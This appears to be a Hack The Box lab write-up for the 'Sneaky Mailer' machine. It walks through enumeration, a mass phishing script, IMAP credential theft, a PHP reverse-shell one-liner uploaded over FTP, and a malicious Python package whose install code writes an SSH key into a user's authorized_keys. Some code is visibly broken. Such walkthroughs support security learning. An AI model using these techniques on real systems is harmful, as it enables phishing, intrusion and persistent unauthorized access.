Sneaky Mailer – Hack The Box Write-up

Information Gathering

As usual lets start with the nmap scan

From the above image I saw that the port 80 is open. In parallel I also triggered a wfuzz for subdomains

Later, When I tried to access port 80, the browser was redirected to sneakycorp.htb. I added this to the hosts file and tried accessing it on the browser.

I also added dev.sneakycorp.htb to the hosts file

In the teams I was able to see a lot of mail addresses


I extracted all the email addresses into a text file

Email extraction can be done using inline tools

The port for SMTP was open and I decided to try sending message to employees and phish them.

I crafted a simple code to get it done

import smtplib

def send(arg1,arg2):
    sender = arg1
    receiver = arg2

    message = """From: From Person <{a}>
    To: To Person <{b}>
    Subject: open this link
    """.format(a=sender, b=receiver)
        print("sending mails to {c} from {d}".format(d=sender, c=receiver))
        smtpObj = smtplib.SMTP('sneakycorp.htb')
        smtpObj.sendmail(sender, receiver, message)
        print("[+] sent!")
with open("email.txt") as doc:
    list ='\n')
for x in range(len(list)):
    send(list[x], list[x-1])

In parallel, I opened a nc session at port 80

I was able to get a response

I tried decoding the response using burpsuite

I got a

username : paulbydr

Password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

With this user name I tried ssh login and slo gtp login.

Later I tried on port 993, IMAP with below command

openssl s_client -crlf -connect

a login paulbyrd ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

The login was success.

In INBOX.Sent Items, i was able to find some files

Lets try to read the emails

a fetch 1 BODY.PEEK[]

this showed me

a fetch 1 BODY.PEEK[]
* 1 FETCH (BODY[] {2167}
MIME-Version: 1.0
To: root <root@debian>
From: Paul Byrd <paulbyrd@sneakymailer.htb>
Subject: Password reset
Date: Fri, 15 May 2020 13:03:37 -0500
Importance: normal
X-Priority: 3
Content-Type: multipart/alternative;

Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="utf-8"

Hello administrator, I want to change this password for the developer accou=

Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Please notify me when you do it=20

Content-Transfer-Encoding: quoted-printable
Content-Type: text/html; charset="utf-8"

<html xmlns:o=3D"urn:schemas-microsoft-com:office:office" xmlns:w=3D"urn:sc=
hemas-microsoft-com:office:word" xmlns:m=3D"
fice/2004/12/omml" xmlns=3D""><head><meta ht=
tp-equiv=3DContent-Type content=3D"text/html; charset=3Dutf-8"><meta name=
=3DGenerator content=3D"Microsoft Word 15 (filtered medium)"><style><!--
/* Font Definitions */
	{font-family:"Cambria Math";
	panose-1:2 4 5 3 5 4 6 3 2 4;}
	panose-1:2 15 5 2 2 2 4 3 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
@page WordSection1
	{size:8.5in 11.0in;
	margin:1.0in 1.0in 1.0in 1.0in;}
--></style></head><body lang=3DEN-US link=3Dblue vlink=3D"#954F72"><div cla=
ss=3DWordSection1><p class=3DMsoNormal>Hello administrator, I want to chang=
e this password for the developer account</p><p class=3DMsoNormal><o:p>&nbs=
p;</o:p></p><p class=3DMsoNormal>Username: developer</p><p class=3DMsoNorma=
l>Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C</p><p class=3DMsoNorm=
al><o:p>&nbsp;</o:p></p><p class=3DMsoNormal>Please notify me when you do i=
t </p></div></body></html>=

a OK FETCH completed.

In the content I got new password & username



From the second mail

Later I tried to access developer through ftp and it was successful

We got a directory dev,

I tried uploading a reverse shell using ftp

php -r ‘$sock=fsockopen(“”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’

I was able to obtain the rev shell by hitting at http://dev.sneakymailer.htb/revShell.php

then I became to be developer by su

Now its time for some Linux enumeration and privilege escalation

I got something intresting


I decrypted it using john

I got a new set of credentials

Usename: pypi

password: soufianeelhaoui

In the second mail which we opened, we had instruction for low.

Low was asked to install pypi module.

I made two files and .pypirc

The above link will give a clear idea.

The content of .pypirc is

└──╼ $cat
import setuptools
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGmUfuM0l7TH3ucVv9QMNvIWBgKFjGgweyLI7u8rlDmS d3r1c@myParrot")
except Exception as e:
  name = "d3r1c", 
  version = "0.0.1",
  author = "Example Author",
  author_email = "",
  description = "A small example package",
  long_description = "",
  long_description_content_type = "text/markdown",
  url = "",
  packages = setuptools.find_packages(),
  classifiers = [
  "Programming Language :: Python :: 3",
  "License :: OSI Approved :: MIT License",
  "Operating System :: OS Independent",

Here I am writing a ssh key for accessing user low

Later I uploaded to developer shell

and executed it

Now I got my ssh key wriiten for low, it is possible for me to login as user Low using ssh

Here key1 is the private key I have

We got user shell!!

I again ran the linux enumeration and I got the below way to be root

By executing the below commands I got root

The above link shows how to use pip to get root

Machine rooted 🙂

Exit mobile version